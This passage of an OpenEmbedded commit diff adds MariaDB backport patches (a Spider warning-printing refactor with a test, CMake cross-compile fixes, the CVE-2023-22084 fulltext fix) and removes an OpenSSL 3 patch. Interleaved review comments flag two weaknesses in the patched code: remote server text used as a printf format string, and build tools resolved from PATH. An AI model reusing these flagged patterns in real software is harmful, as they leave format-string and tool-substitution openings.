CHARSET=utf8; ++SET GLOBAL sql_mode=''; ++connection master_1; 
++CREATE DATABASE auto_test_local; ++USE auto_test_local; ++CREATE TABLE tbl_a ( ++a CHAR(255) ++) ENGINE=Spider DEFAULT CHARSET=utf8 COMMENT='table "tbl_a", srv "s_2_1"'; ++SET sql_mode=''; ++INSERT INTO tbl_a VALUES ("this will be truncated"); ++NOT FOUND /\[WARN SPIDER RESULT\].* Warning 1265 Data truncated for column 'a' at row 1.*/ in mysqld.1.1.err ++SET GLOBAL spider_log_result_errors=4; ++INSERT INTO tbl_a VALUES ("this will be truncated"); ++FOUND 1 /\[WARN SPIDER RESULT\].* Warning 1265 Data truncated for column 'a' at row 1.*/ in mysqld.1.1.err ++connection master_1; ++SET GLOBAL spider_log_result_errors=DEFAULT; ++SET sql_mode=DEFAULT; ++DROP DATABASE IF EXISTS auto_test_local; ++connection child2_1; ++SET GLOBAL sql_mode=DEFAULT; ++DROP DATABASE IF EXISTS auto_test_remote; ++for master_1 ++for child2 ++child2_1 ++child2_2 ++child2_3 ++for child3 +diff --git a/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.cnf b/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.cnf +new file mode 100644 +index 00000000000..05dfd8a0bce +--- /dev/null ++++ b/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.cnf +@@ -0,0 +1,3 @@ ++!include include/default_mysqld.cnf ++!include ../my_1_1.cnf ++!include ../my_2_1.cnf +diff --git a/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.test b/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.test +new file mode 100644 +index 00000000000..3a8fbb251e1 +--- /dev/null ++++ b/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.test +@@ -0,0 +1,56 @@ ++--echo # ++--echo # MDEV-29644 a potential bug of null pointer dereference in spider_db_mbase::print_warnings() ++--echo # ++ ++# The test case below does not cause the potential null pointer dereference. ++# It is just for checking spider_db_mbase::fetch_and_print_warnings() works. 
++ ++--disable_query_log ++--disable_result_log ++--source ../../t/test_init.inc ++--enable_result_log ++--enable_query_log ++ ++--connection child2_1 ++CREATE DATABASE auto_test_remote; ++USE auto_test_remote; ++eval CREATE TABLE tbl_a ( ++ a CHAR(5) ++) $CHILD2_1_ENGINE $CHILD2_1_CHARSET; ++ ++SET GLOBAL sql_mode=''; ++ ++--connection master_1 ++CREATE DATABASE auto_test_local; ++USE auto_test_local; ++eval CREATE TABLE tbl_a ( ++ a CHAR(255) ++) $MASTER_1_ENGINE $MASTER_1_CHARSET COMMENT='table "tbl_a", srv "s_2_1"'; ++ ++SET sql_mode=''; ++ ++let SEARCH_FILE= $MYSQLTEST_VARDIR/log/mysqld.1.1.err; ++let SEARCH_PATTERN= \[WARN SPIDER RESULT\].* Warning 1265 Data truncated for column 'a' at row 1.*; ++ ++INSERT INTO tbl_a VALUES ("this will be truncated"); ++--source include/search_pattern_in_file.inc # should not find ++ ++SET GLOBAL spider_log_result_errors=4; ++ ++INSERT INTO tbl_a VALUES ("this will be truncated"); ++--source include/search_pattern_in_file.inc # should find ++ ++--connection master_1 ++SET GLOBAL spider_log_result_errors=DEFAULT; ++SET sql_mode=DEFAULT; ++DROP DATABASE IF EXISTS auto_test_local; ++ ++--connection child2_1 ++SET GLOBAL sql_mode=DEFAULT; ++DROP DATABASE IF EXISTS auto_test_remote; ++ ++--disable_query_log ++--disable_result_log ++--source ../t/test_deinit.inc ++--enable_query_log ++--enable_result_log +diff --git a/storage/spider/spd_db_mysql.cc b/storage/spider/spd_db_mysql.cc +index d377d2bd807..bc8383017f7 100644 +--- a/storage/spider/spd_db_mysql.cc ++++ b/storage/spider/spd_db_mysql.cc +@@ -2207,7 +2207,7 @@ int spider_db_mbase::exec_query( + db_conn->affected_rows, db_conn->insert_id, + db_conn->server_status, db_conn->warning_count); + if (spider_param_log_result_errors() >= 3) +- print_warnings(l_time); ++ fetch_and_print_warnings(l_time); + } else if (log_result_errors >= 4) + { + time_t cur_time = (time_t) time((time_t*) 0); +@@ -2289,81 +2289,63 @@ bool spider_db_mbase::is_xa_nota_error( + DBUG_RETURN(xa_nota); + } + 
+-int spider_db_mbase::print_warnings( +- struct tm *l_time +-) { ++int spider_db_mbase::fetch_and_print_warnings(struct tm *l_time) ++{ + int error_num = 0; +- DBUG_ENTER("spider_db_mbase::print_warnings"); ++ DBUG_ENTER("spider_db_mbase::fetch_and_print_warnings"); + DBUG_PRINT("info",("spider this=%p", this)); +- if (db_conn->status == MYSQL_STATUS_READY) ++ ++ if (spider_param_dry_access() || db_conn->status != MYSQL_STATUS_READY || ++ db_conn->server_status & SERVER_MORE_RESULTS_EXISTS || ++ !db_conn->warning_count) ++ DBUG_RETURN(0); ++ ++ if (mysql_real_query(db_conn, SPIDER_SQL_SHOW_WARNINGS_STR, ++ SPIDER_SQL_SHOW_WARNINGS_LEN)) ++ DBUG_RETURN(0); ++ ++ MYSQL_RES *res= mysql_store_result(db_conn); ++ if (!res) ++ DBUG_RETURN(0); ++ ++ uint num_fields= mysql_num_fields(res); ++ if (num_fields != 3) + { +- if ( +-#if MYSQL_VERSION_ID < 50500 +- !(db_conn->last_used_con->server_status & SERVER_MORE_RESULTS_EXISTS) && +- db_conn->last_used_con->warning_count +-#else +- !(db_conn->server_status & SERVER_MORE_RESULTS_EXISTS) && +- db_conn->warning_count +-#endif +- ) { +- if ( +- spider_param_dry_access() || +- !mysql_real_query(db_conn, SPIDER_SQL_SHOW_WARNINGS_STR, +- SPIDER_SQL_SHOW_WARNINGS_LEN) +- ) { +- MYSQL_RES *res = NULL; +- MYSQL_ROW row = NULL; +- uint num_fields; +- if ( +- spider_param_dry_access() || +- !(res = mysql_store_result(db_conn)) || +- !(row = mysql_fetch_row(res)) +- ) { +- if (mysql_errno(db_conn)) +- { +- if (res) +- mysql_free_result(res); +- DBUG_RETURN(0); +- } +- /* no record is ok */ +- } +- num_fields = mysql_num_fields(res); +- if (num_fields != 3) +- { +- mysql_free_result(res); +- DBUG_RETURN(0); +- } +- if (l_time) +- { +- while (row) +- { +- fprintf(stderr, "%04d%02d%02d %02d:%02d:%02d [WARN SPIDER RESULT] " +- "from [%s] %ld to %ld: %s %s %s\n", ++ mysql_free_result(res); ++ DBUG_RETURN(0); ++ } ++ ++ MYSQL_ROW row= mysql_fetch_row(res); ++ if (l_time) ++ { ++ while (row) ++ { ++ fprintf(stderr, ++ "%04d%02d%02d 
%02d:%02d:%02d [WARN SPIDER RESULT] from [%s] %ld " ++ "to %ld: %s %s %s\n", + l_time->tm_year + 1900, l_time->tm_mon + 1, l_time->tm_mday, +- l_time->tm_hour, l_time->tm_min, l_time->tm_sec, +- conn->tgt_host, (ulong) db_conn->thread_id, +- (ulong) current_thd->thread_id, row[0], row[1], row[2]); +- row = mysql_fetch_row(res); +- } +- } else { +- while (row) +- { +- DBUG_PRINT("info",("spider row[0]=%s", row[0])); +- DBUG_PRINT("info",("spider row[1]=%s", row[1])); +- DBUG_PRINT("info",("spider row[2]=%s", row[2])); +- longlong res_num = +- (longlong) my_strtoll10(row[1], (char**) NULL, &error_num); +- DBUG_PRINT("info",("spider res_num=%lld", res_num)); +- my_printf_error((int) res_num, row[2], MYF(0)); +- error_num = (int) res_num; +- row = mysql_fetch_row(res); +- } +- } +- if (res) +- mysql_free_result(res); +- } ++ l_time->tm_hour, l_time->tm_min, l_time->tm_sec, conn->tgt_host, ++ (ulong) db_conn->thread_id, (ulong) current_thd->thread_id, row[0], ++ row[1], row[2]); ++ row= mysql_fetch_row(res); ++ } ++ } else { ++ while (row) ++ { ++ DBUG_PRINT("info",("spider row[0]=%s", row[0])); ++ DBUG_PRINT("info",("spider row[1]=%s", row[1])); ++ DBUG_PRINT("info",("spider row[2]=%s", row[2])); ++ longlong res_num = ++ (longlong) my_strtoll10(row[1], (char**) NULL, &error_num); ++ DBUG_PRINT("info",("spider res_num=%lld", res_num)); ++ my_printf_error((int) res_num, row[2], MYF(0)); ++ error_num = (int) res_num; ++ row = mysql_fetch_row(res); + } + } ++ ++ mysql_free_result(res); ++ + DBUG_RETURN(error_num); + } + +@@ -14668,7 +14650,7 @@ int spider_mbase_handler::show_table_status( + DBUG_RETURN(error_num); + } + } +- if ((error_num = ((spider_db_mbase *) conn->db_conn)->print_warnings(NULL))) ++ if ((error_num = ((spider_db_mbase *) conn->db_conn)->fetch_and_print_warnings(NULL))) + { + DBUG_RETURN(error_num); + } +diff --git a/storage/spider/spd_db_mysql.h b/storage/spider/spd_db_mysql.h +index e90461ea278..a2012352f21 100644 +--- a/storage/spider/spd_db_mysql.h 
++++ b/storage/spider/spd_db_mysql.h +@@ -442,7 +442,7 @@ class spider_db_mbase: public spider_db_conn + bool is_xa_nota_error( + int error_num + ); +- int print_warnings( ++ int fetch_and_print_warnings( + struct tm *l_time + ); + spider_db_result *store_result( +-- +2.25.1 + diff --git a/meta-oe/recipes-dbs/mysql/mariadb/0001-sql-CMakeLists.txt-fix-gen_lex_hash-not-found.patch b/meta-oe/recipes-dbs/mysql/mariadb/0001-sql-CMakeLists.txt-fix-gen_lex_hash-not-found.patch new file mode 100644 index 0000000000..456a2bad64 --- /dev/null +++ b/meta-oe/recipes-dbs/mysql/mariadb/0001-sql-CMakeLists.txt-fix-gen_lex_hash-not-found.patch 
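Review bot: In the `else` branch of fetch_and_print_warnings() (new side of the spd_db_mysql.cc hunk carried in this patch file), `my_printf_error((int) res_num, row[2], MYF(0));` passes the warning text returned by the remote server as the format argument, so any `%` in that message would be interpreted as a conversion. The line is inherited from the old print_warnings() body, but since the function is being rewritten it would be safer as `my_printf_error((int) res_num, "%s", MYF(0), row[2]);`. Because this file is marked Upstream-Status: Backport, the change is better proposed upstream than carried as a local divergence. The fprintf branch also prints row[0], row[1] and row[2] with `%s` without a NULL check; presumably SHOW WARNINGS never returns NULL columns, but a one-line comment stating that assumption would help.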
@@ -0,0 +1,69 @@ +From f92f657973997df30afdb0032c88ad3a14ead46b Mon Sep 17 00:00:00 2001 +From: Mingli Yu <mingli.yu@windriver.com> +Date: Fri, 23 Sep 2022 15:48:21 +0800 +Subject: [PATCH] sql/CMakeLists.txt: fix gen_lex_hash not found + +Fix the below do_compile issue in cross-compiling env. +| make[2]: *** No rule to make target '/build/tmp/work/aarch64-poky-linux/mariadb/10.3.13-r0/mariadb-10.3.13/sql/gen_lex_hash', needed by 'sql/lex_hash.h'. Stop. +| make[2]: *** No rule to make target '/build/tmp/work/aarch64-poky-linux/mariadb/10.3.13-r0/mariadb-10.3.13/sql/gen_lex_token', needed by 'sql/lex_token.h'. Stop. + +Upstream-Status: Inappropriate [oe build specific] + +Signed-off-by: Mingli Yu <mingli.yu@windriver.com> +--- + sql/CMakeLists.txt | 30 ++++++++++++++++++++++-------- + 1 file changed, 22 insertions(+), 8 deletions(-) + +diff --git a/sql/CMakeLists.txt b/sql/CMakeLists.txt +index 241b482..27a3991 100644 +--- a/sql/CMakeLists.txt ++++ b/sql/CMakeLists.txt +@@ -60,11 +60,18 @@ ${CMAKE_BINARY_DIR}/sql + ${CMAKE_SOURCE_DIR}/tpool + ) + +-ADD_CUSTOM_COMMAND( +- OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_token.h +- COMMAND gen_lex_token > lex_token.h +- DEPENDS gen_lex_token ++IF(NOT CMAKE_CROSSCOMPILING) ++ ADD_CUSTOM_COMMAND( ++ OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_token.h ++ COMMAND gen_lex_token > lex_token.h ++ DEPENDS gen_lex_token ++) ++ELSE() ++ ADD_CUSTOM_COMMAND( ++ OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_token.h ++ COMMAND gen_lex_token > lex_token.h + ) ++ENDIF() + + FIND_PACKAGE(BISON 2.4) + +@@ -372,11 +379,18 @@ IF(NOT CMAKE_CROSSCOMPILING OR DEFINED CMAKE_CROSSCOMPILING_EMULATOR) + ADD_EXECUTABLE(gen_lex_hash gen_lex_hash.cc) + ENDIF() + +-ADD_CUSTOM_COMMAND( +- OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_hash.h +- COMMAND gen_lex_hash > lex_hash.h +- DEPENDS gen_lex_hash ++IF(NOT CMAKE_CROSSCOMPILING) ++ ADD_CUSTOM_COMMAND( ++ OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_hash.h ++ COMMAND gen_lex_hash > lex_hash.h ++ DEPENDS gen_lex_hash ++) ++ELSE() ++ 
ADD_CUSTOM_COMMAND( ++ OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_hash.h ++ COMMAND gen_lex_hash > lex_hash.h + ) ++ENDIF() + + MYSQL_ADD_EXECUTABLE(mariadb-tzinfo-to-sql tztime.cc) + SET_TARGET_PROPERTIES(mariadb-tzinfo-to-sql PROPERTIES COMPILE_FLAGS "-DTZINFO2SQL") +-- +2.25.1 + diff --git a/meta-oe/recipes-dbs/mysql/mariadb/CVE-2023-22084.patch b/meta-oe/recipes-dbs/mysql/mariadb/CVE-2023-22084.patch new file mode 100644 index 0000000000..3053614854 --- /dev/null +++ b/meta-oe/recipes-dbs/mysql/mariadb/CVE-2023-22084.patch 
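Review bot: The ELSE() branches in both sql/CMakeLists.txt hunks run a bare `gen_lex_token` / `gen_lex_hash` that is no longer a CMake target there, so lex_token.h and lex_hash.h are produced by whichever binary of that name comes first on PATH at build time. The recipe already knows the intended location (mariadb.inc sets `GEN_LEX_HASH=${STAGING_BINDIR_NATIVE}/gen_lex_hash`), so I would resolve the tool explicitly, e.g. `FIND_PROGRAM(GEN_LEX_HASH_EXECUTABLE gen_lex_hash)` followed by `COMMAND ${GEN_LEX_HASH_EXECUTABLE} > lex_hash.h`, and fail configuration when it is not found; the same applies to gen_lex_token. A comment in each ELSE() branch should say that DEPENDS is dropped on purpose because the generator comes from the native build.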
@@ -0,0 +1,91 @@ +From 15ae97b1c2c14f1263cdc853673c4129625323de Mon Sep 17 00:00:00 2001 +From: Marko Mäkelä <marko.makela@mariadb.com> +Date: Thu, 8 Feb 2024 08:09:20 +0000 +Subject: [PATCH] MDEV-32578 row_merge_fts_doc_tokenize() handles parser plugin + inconsistently + +When mysql/mysql-server@0c954c2 +added a plugin interface for FULLTEXT INDEX tokenization to MySQL 5.7, +fts_tokenize_ctx::processed_len got a second meaning, which is only +partly implemented in row_merge_fts_doc_tokenize(). + +This inconsistency could cause a crash when using FULLTEXT...WITH PARSER. +A test case that would crash MySQL 8.0 when using an n-gram parser and +single-character words would fail to crash in MySQL 5.7, because the +buf_full condition in row_merge_fts_doc_tokenize() was not met. + +This change is inspired by +mysql/mysql-server@38e9a07 +that appeared in MySQL 5.7.44. + +CVE: CVE-2023-22084 +Upstream-Status: Backport [https://github.com/MariaDB/server/commit/15ae97b1c2c1] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + storage/innobase/include/row0ftsort.h | 6 +++++- + storage/innobase/row/row0ftsort.cc | 11 ++++++++--- + 2 files changed, 13 insertions(+), 4 deletions(-) + +diff --git a/storage/innobase/include/row0ftsort.h b/storage/innobase/include/row0ftsort.h +index 65508caf..3ffa8243 100644 +--- a/storage/innobase/include/row0ftsort.h ++++ b/storage/innobase/include/row0ftsort.h +@@ -104,7 +104,10 @@ typedef UT_LIST_BASE_NODE_T(row_fts_token_t) fts_token_list_t; + + /** Structure stores information from string tokenization operation */ + struct fts_tokenize_ctx { +- ulint processed_len; /*!< processed string length */ ++ /** the processed string length in bytes ++ (when using the built-in tokenizer), ++ or the number of row_merge_fts_doc_tokenize_by_parser() calls */ ++ ulint processed_len; + ulint init_pos; /*!< doc start position */ + ulint buf_used; /*!< the sort buffer (ID) when + tokenization stops, which +@@ -115,6 +118,7 @@ struct 
fts_tokenize_ctx { + ib_rbt_t* cached_stopword;/*!< in: stopword list */ + dfield_t sort_field[FTS_NUM_FIELDS_SORT]; + /*!< in: sort field */ ++ /** parsed tokens (when using an external parser) */ + fts_token_list_t fts_token_list; + + fts_tokenize_ctx() : +diff --git a/storage/innobase/row/row0ftsort.cc b/storage/innobase/row/row0ftsort.cc +index 86e96624..406ff60f 100644 +--- a/storage/innobase/row/row0ftsort.cc ++++ b/storage/innobase/row/row0ftsort.cc +@@ -491,7 +491,10 @@ row_merge_fts_doc_tokenize( + + /* Tokenize the data and add each word string, its corresponding + doc id and position to sort buffer */ +- while (t_ctx->processed_len < doc->text.f_len) { ++ while (parser ++ ? (!t_ctx->processed_len ++ || UT_LIST_GET_LEN(t_ctx->fts_token_list)) ++ : t_ctx->processed_len < doc->text.f_len) { + ulint idx = 0; + ulint cur_len; + doc_id_t write_doc_id; +@@ -831,7 +834,8 @@ void fts_parallel_tokenization( + /* Not yet finish processing the "doc" on hand, + continue processing it */ + ut_ad(doc.text.f_str); +- ut_ad(t_ctx.processed_len < doc.text.f_len); ++ ut_ad(buf[0]->index->parser ++ || t_ctx.processed_len < doc.text.f_len); + } + + processed = row_merge_fts_doc_tokenize( +@@ -841,7 +845,8 @@ void fts_parallel_tokenization( + + /* Current sort buffer full, need to recycle */ + if (!processed) { +- ut_ad(t_ctx.processed_len < doc.text.f_len); ++ ut_ad(buf[0]->index->parser ++ || t_ctx.processed_len < doc.text.f_len); + ut_ad(t_ctx.rows_added[t_ctx.buf_used]); + break; + } +-- +2.40.0 diff --git a/meta-oe/recipes-dbs/mysql/mariadb/cross-compiling.patch b/meta-oe/recipes-dbs/mysql/mariadb/cross-compiling.patch new file mode 100644 index 0000000000..d0d6e3c730 --- /dev/null +++ b/meta-oe/recipes-dbs/mysql/mariadb/cross-compiling.patch 
@@ -0,0 +1,34 @@
+From 80be37351d995654f86b838f6b5ed47e8a90261b Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Fri, 23 Sep 2022 12:05:17 +0800
+Subject: [PATCH] CMakeLists.txt: not include import_executables.cmake
+
+building failed since native does not generate import_executables.cmake
+In fact, our building system will export the needed commands.
+
+Upstream-Status: Inappropriate [oe specific]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ CMakeLists.txt | 5 -----
+ 1 file changed, 5 deletions(-)
+
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index f9e2b1b..34924ba 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -394,11 +394,6 @@ CHECK_LIBFMT()
+ ADD_SUBDIRECTORY(tpool)
+ CHECK_SYSTEMD()
+
+-IF(CMAKE_CROSSCOMPILING AND NOT DEFINED CMAKE_CROSSCOMPILING_EMULATOR)
+- SET(IMPORT_EXECUTABLES "IMPORTFILE-NOTFOUND" CACHE FILEPATH "Path to import_executables.cmake from a native build")
+- INCLUDE(${IMPORT_EXECUTABLES})
+-ENDIF()
+-
+ #
+ # Setup maintainer mode options. Platform checks are
+ # not run with the warning options as to not perturb fragile checks
+--
+2.25.1
+
diff --git a/meta-oe/recipes-dbs/mysql/mariadb/mariadb-openssl3.patch b/meta-oe/recipes-dbs/mysql/mariadb/mariadb-openssl3.patch
deleted file mode 100644
index 878675f30d..0000000000
--- a/meta-oe/recipes-dbs/mysql/mariadb/mariadb-openssl3.patch
+++ /dev/null
@@ -1,416 +0,0 @@ -From 1626955f3a2107ec4c7fd927ebfa3c6c1d2b09b8 Mon Sep 17 00:00:00 2001 -From: Vladislav Vaintroub <wlad@mariadb.com> -Date: Mon, 8 Nov 2021 18:48:19 +0100 -Subject: [PATCH] MDEV-25785 Add support for OpenSSL 3.0 - -Summary of changes - -- MD_CTX_SIZE is increased - -- EVP_CIPHER_CTX_buf_noconst(ctx) does not work anymore, points - to nobody knows where. The assumption made previously was that - (since the function does not seem to be documented) - was that it points to the last partial source block. - Add own partial block buffer for NOPAD encryption instead - -- SECLEVEL in CipherString in openssl.cnf - had been downgraded to 0, from 1, to make TLSv1.0 and TLSv1.1 possible - -- Workaround Ssl_cipher_list issue, it now returns TLSv1.3 ciphers, - in addition to what was set in --ssl-cipher - -- ctx_buf buffer now must be aligned to 16 bytes with openssl( - previously with WolfSSL only), ot crashes will happen - -- updated aes-t , to be better debuggable - using function, rather than a huge multiline macro - added test that does "nopad" encryption piece-wise, to test - replacement of EVP_CIPHER_CTX_buf_noconst - -Patch from Fedora https://src.fedoraproject.org/rpms/mariadb/raw/rawhide/f/mariadb-openssl3.patch - -Upstream-Status: Backport [https://github.com/MariaDB/server/commit/d42c2efbaa06a0307c2f0fd8fa87819ff50bbd7e] -Signed-off-by: Khem Raj <raj.khem@gmail.com> -Signed-off-by: Mingli Yu <mingli.yu@windriver.com> ---- - cmake/ssl.cmake | 21 +++++- - include/mysql/service_my_crypt.h | 2 +- - include/ssl_compat.h | 3 +- - mysql-test/lib/openssl.cnf | 2 +- - mysql-test/main/ssl_cipher.result | 6 +- - mysql-test/main/ssl_cipher.test | 2 +- - mysys_ssl/my_crypt.cc | 46 +++++++----- - unittest/mysys/aes-t.c | 121 ++++++++++++++++++++++-------- - 8 files changed, 143 insertions(+), 60 deletions(-) - -diff --git a/cmake/ssl.cmake b/cmake/ssl.cmake -index a6793cf3..64c93ff9 100644 ---- a/cmake/ssl.cmake -+++ b/cmake/ssl.cmake -@@ -118,7 +118,7 @@ MACRO 
(MYSQL_CHECK_SSL) - ENDIF() - FIND_PACKAGE(OpenSSL) - SET_PACKAGE_PROPERTIES(OpenSSL PROPERTIES TYPE RECOMMENDED) -- IF(OPENSSL_FOUND AND OPENSSL_VERSION AND OPENSSL_VERSION VERSION_LESS "3.0.0") -+ IF(OPENSSL_FOUND) - SET(OPENSSL_LIBRARY ${OPENSSL_SSL_LIBRARY}) - INCLUDE(CheckSymbolExists) - SET(SSL_SOURCES "") -@@ -139,9 +139,20 @@ MACRO (MYSQL_CHECK_SSL) - SET(SSL_INTERNAL_INCLUDE_DIRS "") - SET(SSL_DEFINES "-DHAVE_OPENSSL") - -+ FOREACH(x INCLUDES LIBRARIES DEFINITIONS) -+ SET(SAVE_CMAKE_REQUIRED_${x} ${CMAKE_REQUIRED_${x}}) -+ ENDFOREACH() -+ -+ # Silence "deprecated in OpenSSL 3.0" -+ IF((NOT OPENSSL_VERSION) # 3.0 not determined by older cmake -+ OR NOT(OPENSSL_VERSION VERSION_LESS "3.0.0")) -+ SET(SSL_DEFINES "${SSL_DEFINES} -DOPENSSL_API_COMPAT=0x10100000L") -+ SET(CMAKE_REQUIRED_DEFINITIONS -DOPENSSL_API_COMPAT=0x10100000L) -+ ENDIF() -+ - SET(CMAKE_REQUIRED_INCLUDES ${OPENSSL_INCLUDE_DIR}) - SET(CMAKE_REQUIRED_LIBRARIES ${SSL_LIBRARIES}) -- SET(CMAKE_REQUIRED_INCLUDES ${OPENSSL_INCLUDE_DIR}) -+ - CHECK_SYMBOL_EXISTS(ERR_remove_thread_state "openssl/err.h" - HAVE_ERR_remove_thread_state) - CHECK_SYMBOL_EXISTS(EVP_aes_128_ctr "openssl/evp.h" -@@ -150,8 +161,10 @@ MACRO (MYSQL_CHECK_SSL) - HAVE_EncryptAes128Gcm) - CHECK_SYMBOL_EXISTS(X509_check_host "openssl/x509v3.h" - HAVE_X509_check_host) -- SET(CMAKE_REQUIRED_INCLUDES) -- SET(CMAKE_REQUIRED_LIBRARIES) -+ -+ FOREACH(x INCLUDES LIBRARIES DEFINITIONS) -+ SET(CMAKE_REQUIRED_${x} ${SAVE_CMAKE_REQUIRED_${x}}) -+ ENDFOREACH() - ELSE() - IF(WITH_SSL STREQUAL "system") - MESSAGE(FATAL_ERROR "Cannot find appropriate system libraries for SSL. 
Use WITH_SSL=bundled to enable SSL support") -diff --git a/include/mysql/service_my_crypt.h b/include/mysql/service_my_crypt.h -index 2a232117..bb038aaa 100644 ---- a/include/mysql/service_my_crypt.h -+++ b/include/mysql/service_my_crypt.h -@@ -45,7 +45,7 @@ extern "C" { - /* The max key length of all supported algorithms */ - #define MY_AES_MAX_KEY_LENGTH 32 - --#define MY_AES_CTX_SIZE 656 -+#define MY_AES_CTX_SIZE 672 - - enum my_aes_mode { - MY_AES_ECB, MY_AES_CBC -diff --git a/include/ssl_compat.h b/include/ssl_compat.h -index 8dc12254..6db1baab 100644 ---- a/include/ssl_compat.h -+++ b/include/ssl_compat.h -@@ -24,7 +24,7 @@ - #define SSL_LIBRARY OpenSSL_version(OPENSSL_VERSION) - #define ERR_remove_state(X) ERR_clear_error() - #define EVP_CIPHER_CTX_SIZE 176 --#define EVP_MD_CTX_SIZE 48 -+#define EVP_MD_CTX_SIZE 72 - #undef EVP_MD_CTX_init - #define EVP_MD_CTX_init(X) do { memset((X), 0, EVP_MD_CTX_SIZE); EVP_MD_CTX_reset(X); } while(0) - #undef EVP_CIPHER_CTX_init -@@ -77,7 +77,6 @@ - #define DH_set0_pqg(D,P,Q,G) ((D)->p= (P), (D)->g= (G)) - #endif - --#define EVP_CIPHER_CTX_buf_noconst(ctx) ((ctx)->buf) - #define EVP_CIPHER_CTX_encrypting(ctx) ((ctx)->encrypt) - #define EVP_CIPHER_CTX_SIZE sizeof(EVP_CIPHER_CTX) - -diff --git a/mysql-test/lib/openssl.cnf b/mysql-test/lib/openssl.cnf -index b9ab37ac..7cd6f748 100644 ---- a/mysql-test/lib/openssl.cnf -+++ b/mysql-test/lib/openssl.cnf -@@ -9,4 +9,4 @@ ssl_conf = ssl_section - system_default = system_default_section - - [system_default_section] --CipherString = ALL:@SECLEVEL=1 -+CipherString = ALL:@SECLEVEL=0 -diff --git a/mysql-test/main/ssl_cipher.result b/mysql-test/main/ssl_cipher.result -index 930d384e..66d817b7 100644 ---- a/mysql-test/main/ssl_cipher.result -+++ b/mysql-test/main/ssl_cipher.result -@@ -61,8 +61,8 @@ connect ssl_con,localhost,root,,,,,SSL; - SHOW STATUS LIKE 'Ssl_cipher'; - Variable_name Value - Ssl_cipher AES128-SHA --SHOW STATUS LIKE 'Ssl_cipher_list'; --Variable_name Value 
--Ssl_cipher_list AES128-SHA -+SELECT VARIABLE_VALUE like '%AES128-SHA%' FROM INFORMATION_SCHEMA.SESSION_STATUS WHERE VARIABLE_NAME='Ssl_cipher_list'; -+VARIABLE_VALUE like '%AES128-SHA%' -+1 - disconnect ssl_con; - connection default; -diff --git a/mysql-test/main/ssl_cipher.test b/mysql-test/main/ssl_cipher.test -index 36549d76..d4cdcffb 100644 ---- a/mysql-test/main/ssl_cipher.test -+++ b/mysql-test/main/ssl_cipher.test -@@ -98,6 +98,6 @@ let $restart_parameters=--ssl-cipher=AES128-SHA; - source include/restart_mysqld.inc; - connect (ssl_con,localhost,root,,,,,SSL); - SHOW STATUS LIKE 'Ssl_cipher'; --SHOW STATUS LIKE 'Ssl_cipher_list'; -+SELECT VARIABLE_VALUE like '%AES128-SHA%' FROM INFORMATION_SCHEMA.SESSION_STATUS WHERE VARIABLE_NAME='Ssl_cipher_list'; - disconnect ssl_con; - connection default; -diff --git a/mysys_ssl/my_crypt.cc b/mysys_ssl/my_crypt.cc -index e512eee9..4d7ebc7b 100644 ---- a/mysys_ssl/my_crypt.cc -+++ b/mysys_ssl/my_crypt.cc -@@ -29,11 +29,7 @@ - #include <ssl_compat.h> - #include <cstdint> - --#ifdef HAVE_WOLFSSL - #define CTX_ALIGN 16 --#else --#define CTX_ALIGN 0 --#endif - - class MyCTX - { -@@ -100,8 +96,9 @@ class MyCTX_nopad : public MyCTX - { - public: - const uchar *key; -- uint klen, buf_len; -+ uint klen, source_tail_len; - uchar oiv[MY_AES_BLOCK_SIZE]; -+ uchar source_tail[MY_AES_BLOCK_SIZE]; - - MyCTX_nopad() : MyCTX() { } - ~MyCTX_nopad() { } -@@ -112,7 +109,7 @@ class MyCTX_nopad : public MyCTX - compile_time_assert(MY_AES_CTX_SIZE >= sizeof(MyCTX_nopad)); - this->key= key; - this->klen= klen; -- this->buf_len= 0; -+ this->source_tail_len= 0; - if (ivlen) - memcpy(oiv, iv, ivlen); - DBUG_ASSERT(ivlen == 0 || ivlen == sizeof(oiv)); -@@ -123,26 +120,41 @@ class MyCTX_nopad : public MyCTX - return res; - } - -+ /** Update last partial source block, stored in source_tail array. 
*/ -+ void update_source_tail(const uchar* src, uint slen) -+ { -+ if (!slen) -+ return; -+ uint new_tail_len= (source_tail_len + slen) % MY_AES_BLOCK_SIZE; -+ if (new_tail_len) -+ { -+ if (slen + source_tail_len < MY_AES_BLOCK_SIZE) -+ { -+ memcpy(source_tail + source_tail_len, src, slen); -+ } -+ else -+ { -+ DBUG_ASSERT(slen > new_tail_len); -+ memcpy(source_tail, src + slen - new_tail_len, new_tail_len); -+ } -+ } -+ source_tail_len= new_tail_len; -+ } -+ - int update(const uchar *src, uint slen, uchar *dst, uint *dlen) - { -- buf_len+= slen; -+ update_source_tail(src, slen); - return MyCTX::update(src, slen, dst, dlen); - } - - int finish(uchar *dst, uint *dlen) - { -- buf_len %= MY_AES_BLOCK_SIZE; -- if (buf_len) -+ if (source_tail_len) - { -- uchar *buf= EVP_CIPHER_CTX_buf_noconst(ctx); - /* - Not much we can do, block ciphers cannot encrypt data that aren't - a multiple of the block length. At least not without padding. - Let's do something CTR-like for the last partial block. -- -- NOTE this assumes that there are only buf_len bytes in the buf. -- If OpenSSL will change that, we'll need to change the implementation -- of this class too. - */ - uchar mask[MY_AES_BLOCK_SIZE]; - uint mlen; -@@ -154,10 +166,10 @@ class MyCTX_nopad : public MyCTX - return rc; - DBUG_ASSERT(mlen == sizeof(mask)); - -- for (uint i=0; i < buf_len; i++) -- dst[i]= buf[i] ^ mask[i]; -+ for (uint i=0; i < source_tail_len; i++) -+ dst[i]= source_tail[i] ^ mask[i]; - } -- *dlen= buf_len; -+ *dlen= source_tail_len; - return MY_AES_OK; - } - }; -diff --git a/unittest/mysys/aes-t.c 